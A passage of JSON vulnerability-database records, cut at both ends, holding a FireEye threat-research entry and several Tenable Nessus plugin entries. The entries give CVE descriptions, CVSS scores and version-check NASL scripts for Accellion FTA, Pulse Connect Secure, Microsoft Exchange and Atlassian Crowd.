Please note that the ICT does not scan the rollback partition.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-27T00:00:00", "type": "fireeye", "title": "Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-27T00:00:00", "id": "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "href": "https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:58:37", "description": "The version of the remote Accellion Secure File Transfer Appliance is prior to 9_12_416. It is, therefore, affected by multiple vulnerabilities:\n\n - SQL injection via a crafted Host header in a request to an endpoint. (CVE-2021-27101)\n\n - OS command execution via a local web service call. (CVE-2021-27102)\n\n - SSRF via a crafted POST request to an endpoint. 
(CVE-2021-27103)\n\n - OS command execution via a crafted POST request to various admin endpoints. (CVE-2021-27104)\n\nAlso, Accellion File Transfer Appliance is no longer supported by the vendor.\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain other security vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-05T00:00:00", "type": "nessus", "title": "Accellion File Transfer Appliance < 9_12_416 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/h:accellion:secure_file_transfer_appliance"], "id": "ACCELLION_FTA_9_12_380.NASL", "href": "https://www.tenable.com/plugins/nessus/154933", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154933);\n script_version(\"1.6\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-27101\",\n \"CVE-2021-27102\",\n \"CVE-2021-27103\",\n \"CVE-2021-27104\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0011\");\n\n script_name(english:\"Accellion File Transfer Appliance < 9_12_416 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote Accellion Secure File Transfer Appliance is prior to 9_12_416. It is, therefore, \naffected by multiple vulnerabilities:\n\n - SQL injection via a crafted Host header in a request to an endpoint. (CVE-2021-27101)\n\n - OS command execution via a local web service call. (CVE-2021-27102)\n\n - SSRF via a crafted POST request to an endpoint. (CVE-2021-27103)\n\n - OS command execution via a crafted POST request to various admin endpoints. (CVE-2021-27104)\n\nAlso, Accellion File Transfer Appliance is no longer supported by the vendor.\nLack of support implies that no new security patches for the product will be released by the vendor. 
\nAs a result, it is likely to contain other security vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/accellion/CVEs\");\n # https://www.accellion.com/sites/default/files/resources/fta-eol.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6f8410d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to version 9_12_416 or later, or \n upgrade to a more secure platform, kiteworks that is currently supported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:accellion:secure_file_transfer_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"accellion_file_transfer_appliance_unsupported.nasl\");\n script_require_keys(\"installed_sw/Accellion Secure File Transfer Appliance\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp_name = 'Accellion Secure File Transfer Appliance';\n\nif (!get_install_count(app_name:app_name))\n audit(AUDIT_NOT_DETECT, app_name);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:443);\n\nreport = 'The remote host is running Accellion File Transfer Appliance (FTA) that is End of Life (EOL) on Apr 30th 2021.\\n' +\n 'It is recommended by Accellion that all customers upgrade to a more secure platform, kiteworks that is currently supported.\\n\\n' + \n 'Otherwise, update to Accellion FTA version 9_12_416 or later.';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:39", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than 9.0R3 and prior to 9.1R11.4. 
It is, therefore, affected by multiple vulnerabilities including an authentication bypass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R11.4 (SA44784)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44784.NASL", "href": "https://www.tenable.com/plugins/nessus/148847", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148847);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n 
script_cve_id(\n \"CVE-2021-22893\",\n \"CVE-2021-22894\",\n \"CVE-2021-22899\",\n \"CVE-2021-22900\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0207-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0024\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R11.4 (SA44784)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than\n9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass\nvulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect\nSecure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R11.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22894\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22893\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/\n# 9.1R11.3 is 9.1.11.12173\n# 9.1R11.4 is 9.1.11.12319\nconstraints = [\n {'min_version':'9.0.3', 'max_version':'9.1.11.12173', 'fixed_display':'9.1R11.4 (9.1.11.12319)'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-07T14:59:28", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been targeted in the Hafnium campaign. 
It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for .aspx files that could potentially indicate compromise.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "nessus", "title": "Potential exposure to Hafnium Microsoft Exchange targeting", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "HAFNIUM_IOC_DETECT.NBIN", "href": "https://www.tenable.com/plugins/nessus/147193", "sourceData": "Binary data hafnium_ioc_detect.nbin", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T14:46:27", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. 
(CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (March 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2023-01-31T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "href": "https://www.tenable.com/plugins/nessus/147003", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147003);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/31\");\n\n script_cve_id(\n \"CVE-2021-26412\",\n \"CVE-2021-26854\",\n \"CVE-2021-26855\",\n \"CVE-2021-26857\",\n \"CVE-2021-26858\",\n \"CVE-2021-27065\",\n \"CVE-2021-27078\"\n );\n script_xref(name:\"MSKB\", value:\"5000871\");\n script_xref(name:\"MSFT\", value:\"MS21-5000871\");\n script_xref(name:\"IAVA\", value:\"2021-A-0111-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/16\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0014\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0018\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0013\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. 
(CVE-2021-26412, CVE-2021-26854,\n CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065,\n CVE-2021-27078)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14b26c05\");\n # https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fedb98e4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5000871\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26855\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyLogon RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 14,\n 'min_version': '15.01.1847.0',\n 'fixed_version': '15.01.1847.12',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 15,\n 'min_version': '15.01.1913.0',\n 'fixed_version': '15.01.1913.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 16,\n 'min_version': '15.01.1979.0',\n 'fixed_version': '15.01.1979.8',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 18,\n 'min_version': '15.01.2106.0',\n 'fixed_version': '15.01.2106.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 19,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.9',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 4,\n 'min_version': '15.02.529.0',\n 'fixed_version': 
'15.02.529.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 5,\n 'min_version': '15.02.595.0',\n 'fixed_version': '15.02.595.8',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 6,\n 'min_version': '15.02.659.0',\n 'fixed_version': '15.02.659.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 7,\n 'min_version': '15.02.721.0',\n 'fixed_version': '15.02.721.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.10',\n 'kb': '5000871'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-12',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:01", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.3.x < 3.3.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98657", "href": "https://www.tenable.com/plugins/was/98657", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:01", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. 
It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.2.x < 3.2.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98658", "href": "https://www.tenable.com/plugins/was/98658", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:02", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 
3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98656", 